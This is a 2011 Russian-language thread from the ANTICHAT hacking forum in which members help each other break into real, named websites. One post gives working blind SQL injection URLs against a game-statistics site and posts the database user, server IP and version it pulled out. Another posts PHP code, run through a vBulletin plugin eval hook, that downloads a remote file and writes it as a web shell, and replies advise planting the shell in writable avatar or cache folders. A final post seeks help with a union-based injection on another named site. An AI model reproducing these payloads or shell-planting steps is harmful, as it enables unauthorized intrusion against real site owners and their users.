ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.10.2011, 20:42
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от root47
root47 said:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?
Конечно, можно !!!
Но вывода я не нашёл. Так что крутил как Blind SQL.
Там 5 ветка, так что тебе повезло.
Код:
Code:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+substring((version()),1,1)=5
Выдирай посимвольно через ASCII например вот так:
Код:
Code:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),1,1))=53
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),2,1))=46
Часть данных:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Current User[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]cod4[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]95.154.113.66
Sql Version[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5.1.58
Current DB[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]cod4[/COLOR][/COLOR]
|
|
|
27.10.2011, 21:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
4760
Репутация:
0
|
|
Спасибо , ликани сыль на Blind SQL
|
|
|
|
27.10.2011, 22:54
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от root47
root47 said:
Спасибо , ликани сыль на Blind SQL
Вот неплохая статья
тыц
|
|
|
|
27.10.2011, 23:02
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Ребят, вопрос...
Заливка шелла на воблу через плагины. (ajax_complete)
Код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$linky[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://site.com/blabla/name.txt"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$saved[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"./ololo.php"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$linky[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$saved[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"w"[/COLOR][COLOR="#007700"]);
while(![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4096[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fputs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'done'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
При заходе на site.com/forum/ajax.php
выбивает:
Код:
Code:
Warning: fopen(./ololo.php) [function.fopen]: failed to open stream: Permission denied in [path]/ajax.php(1279) : eval()'d code on line 4
Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
[куча таких же строчек]
Warning: fclose(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 9
done
Вопрос заключается в том, как же это исправить, либо, есть ли какая альтернатива? |
|
|
|
27.10.2011, 23:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от None
Permission denied in [path]/ajax.php(1279)
Нет прав на запись в эту папку для этого скрипта. Ищи ту, в которую можно залить (зачастую с картинками, css, js)
|
|
|
|
27.10.2011, 23:24
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?
|
|
|
|
27.10.2011, 23:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от Fooog
Fooog said:
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?
Искать папку с правами на запись. Вроде бы это очевидно.
Посмотри куда заливаются аватарки на форуме, если не в БД сэйвятся, то лей в ту же директорию и шелл.
|
|
|
|
27.10.2011, 23:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Fooog
Fooog said:
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?
Плагины тут не причём. Это нормальные настройки на сервере на всю папку. Ищи те, что я сказал, у некоторых цмс есть свои темповые папки или папки под кэш, в них должно залиться(upd: если они конечно юзались, а то так могут и стоять права, при которых ты не сможешь залить)
|
|
|
|
27.10.2011, 23:41
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Насчет папки да. Разобрался.
Сообщение от None
могут и стоять права, при которых ты не сможешь залить
Да, да. Я и говорю о альтернативе...
пс
Сообщение от None
куда заливаются аватарки на форуме
на этом форуме и аватарок нету. |
|
|
|
28.10.2011, 11:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
10263
Репутация:
0
|
|
Помогите плиз. разобраться с таким выражением, как дальше его раскрутить? (все испробовал дальше не могу продвинуться, как то не стандартно с кавычками...)
-ttp://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
